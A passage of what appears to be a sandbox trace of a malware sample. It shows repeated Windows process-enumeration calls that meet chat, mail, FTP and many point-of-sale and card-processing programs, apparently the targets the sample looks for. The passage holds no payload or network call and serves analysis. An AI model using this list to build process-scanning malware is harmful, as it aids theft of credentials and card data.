pcPriClassBase=8, dwFlags=0x0, szExeFile="pidgin.exe")) returned 1 [0248.128] Process32Next (in: hSnapshot=0x1884, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf68, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="scriptftp.exe")) returned 1 [0248.129] Process32Next (in: hSnapshot=0x1884, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf84, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="skype.exe")) returned 1 [0248.131] Process32Next (in: hSnapshot=0x1884, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf8c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="smartftp.exe")) returned 1 [0248.133] Process32Next (in: hSnapshot=0x1884, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf98, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="thunderbird.exe")) returned 1 [0248.134] Process32Next (in: hSnapshot=0x1884, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfa0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="trillian.exe")) returned 1 [0248.137] Process32Next (in: hSnapshot=0x1884, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="webdrive.exe")) returned 1 [0248.139] Process32Next (in: hSnapshot=0x1884, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfb8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="whatsapp.exe")) returned 1 [0248.140] Process32Next (in: hSnapshot=0x1884, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfd0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="winscp.exe")) returned 1 [0248.142] Process32Next (in: hSnapshot=0x1884, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfe0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="yahoomessenger.exe")) returned 1 [0248.143] Process32Next (in: hSnapshot=0x1884, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xff4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="active-charge.exe")) returned 1 [0248.145] Process32Next (in: hSnapshot=0x1884, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x878, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="accupos.exe")) returned 1 [0248.147] Process32Next (in: hSnapshot=0x1884, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x858, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="afr38.exe")) returned 1 [0248.149] Process32Next (in: hSnapshot=0x1884, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="aldelo.exe")) returned 1 [0248.150] Process32Next (in: hSnapshot=0x1884, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe54, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="ccv_server.exe")) returned 1 [0248.153] Process32Next (in: hSnapshot=0x1884, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x660, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="centralcreditcard.exe")) returned 1 [0248.155] Process32Next (in: hSnapshot=0x1884, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb2c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="creditservice.exe")) returned 1 [0248.156] Process32Next (in: hSnapshot=0x1884, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x72c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="edcsvr.exe")) returned 1 [0248.158] Process32Next (in: hSnapshot=0x1884, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1004, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="fpos.exe")) returned 1 [0248.159] Process32Next (in: hSnapshot=0x1884, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1014, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="isspos.exe")) returned 1 [0248.161] Process32Next (in: hSnapshot=0x1884, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x101c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="mxslipstream.exe")) returned 1 [0248.167] Process32Next (in: hSnapshot=0x1884, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x102c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="omnipos.exe")) returned 1 [0248.169] Process32Next (in: hSnapshot=0x1884, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x103c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="spcwin.exe")) returned 1 [0248.171] Process32Next (in: hSnapshot=0x1884, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1048, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="spgagentservice.exe")) returned 1 [0248.173] Process32Next (in: hSnapshot=0x1884, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1054, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="utg2.exe")) returned 1 [0248.174] Process32Next (in: hSnapshot=0x1884, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x108c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="discussion.exe")) returned 1 [0248.176] Process32Next (in: hSnapshot=0x1884, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1094, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="styledesignbusiness.exe")) returned 1 [0248.177] Process32Next (in: hSnapshot=0x1884, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x109c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="new_door.exe")) returned 1 [0248.178] Process32Next (in: hSnapshot=0x1884, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="bed fight.exe")) returned 1 [0248.180] Process32Next (in: hSnapshot=0x1884, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="federal hotel.exe")) returned 1 [0248.181] Process32Next (in: hSnapshot=0x1884, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0248.184] Process32Next (in: hSnapshot=0x1884, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0248.186] Process32Next (in: hSnapshot=0x1884, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0248.187] Process32Next (in: hSnapshot=0x1884, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 0 [0248.188] CloseHandle (hObject=0x1884) returned 1 [0248.189] Sleep (dwMilliseconds=0x64) [0248.341] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1018 [0248.349] Process32First (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0248.350] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x73, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0248.352] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x138, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0248.354] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x17c, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0248.355] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x17c, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0248.357] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0248.359] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0248.360] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x214, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0248.361] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x21c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0248.363] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x274, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0248.364] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0248.365] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x30c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1fc, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0248.367] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x360, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x45, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0248.368] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x378, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0248.369] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x390, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0248.372] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0248.373] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0248.374] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x210, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0248.376] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x460, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0248.377] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0248.420] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x54c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0248.421] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x604, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0248.423] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x64c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0248.424] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2e, th32ParentProcessID=0x798, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0248.426] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0248.427] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x894, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1 [0248.429] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x908, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1f, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1 [0248.431] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbd0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="WMIADAP.exe")) returned 1 [0248.432] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xba8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0248.435] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xad4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0248.436] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x670, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0248.438] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x9d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0248.440] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x128, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x670, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0248.442] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x428, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="degree_sing_pretty.exe")) returned 1 [0248.444] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x840, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="work-heavy.exe")) returned 1 [0248.446] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="member.exe")) returned 1 [0248.448] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb88, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="real-new.exe")) returned 1 [0248.451] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="letter.exe")) returned 1 [0248.455] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc04, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="lightwhere.exe")) returned 1 [0248.457] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc84, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="charge_model_ready.exe")) returned 1 [0248.459] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd14, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="fearfew.exe")) returned 1 [0248.461] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="bag-begin-gas.exe")) returned 1 [0248.463] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd64, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="take whether.exe")) returned 1 [0248.691] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd88, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="common trade station.exe")) returned 1 [0248.692] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xda8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="small_money.exe")) returned 1 [0248.694] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdbc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="magazineofficialteach.exe")) returned 1 [0248.706] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="involve.exe")) returned 1 [0248.708] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdd4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="religious_free_generation.exe")) returned 1 [0248.710] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="hair friend will.exe")) returned 1 [0248.711] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdf4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="whose.exe")) returned 1 [0248.713] Process32Next (in: hSnapshot=0x1018, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe80, th32DefaultHeapID=0x0, 